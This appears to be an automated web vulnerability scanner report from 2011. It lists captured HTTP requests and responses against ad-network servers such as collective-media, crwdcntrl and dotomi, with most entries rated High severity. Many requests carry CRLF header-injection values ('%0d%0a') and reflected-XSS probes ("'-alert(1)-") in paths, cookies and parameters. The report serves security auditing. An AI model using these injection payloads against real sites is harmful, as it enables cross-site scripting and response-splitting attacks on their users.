GET /adsc/d927907/35/43624044 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.answerology Cookie: ES=9b8a5%0d%0a91d788bd1b; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:30:03 GMT Server: Apache-AdvancedExtra X-Powered-By: PHP/4.3.8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: a229.dl Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 17:30:02 GMT; path=/; domain=.questionmarket Set-Cookie: CS1=43208740-5-1_845473-1 Set-Cookie: ES=9b8a5 91d788bd1b_927907-9E[|M-0; expires=Wed, 07-Nov-2012 09:30:03 GMT; path=/; domain=.questionmarket Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: DotomiUser=230600846 |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:24:55 GMT X-Name: dmc-s02 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:24:55 GMT; Path=/ Location: http://login.dotomi.com abef94bf3d9 Content-Type: text/html Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: cc=optout |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:45 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:52 GMT Location: http://optout.crwdcntrl c8452c8724b&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=71d66%0d%0a93e8c521907 HTTP/1.1 Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:24 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:31 GMT Location: http://optout.crwdcntrl 93e8c521907&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:33 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:40 GMT Location: http://optout.crwdcntrl ae1dd9efdab=1&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA12fa62'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 462 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:36 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 462 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:37 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 466 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:34 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/bzo.454.61DCBAA1/ |
GET /adj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 463 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:25:20 GMT Connection: close Set-Cookie: dc=sea-dc; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:03 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:03 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 475 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:48:01 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 472 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:47:59 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:29 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:30 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:28 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 468 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:49:26 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:43 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 467 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:44 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 471 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:41 GMT Connection: close Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/q1.q.seattlepos |
GET /adj/q1.q.seattlepos Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 468 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Set-Cookie: dc=sea-dc90af58da957 Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadjaac19'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7362 Date: Sat, 17 Sep 2011 16:25:34 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1d936d'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 16:25:35 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7354 Date: Sat, 17 Sep 2011 16:25:35 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/bzo.454.61DCBAA1/ |
GET /cmadj/bzo.454.61DCBAA1/ Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7329 Date: Sat, 17 Sep 2011 16:25:27 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... age="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj6c87f'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:08 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
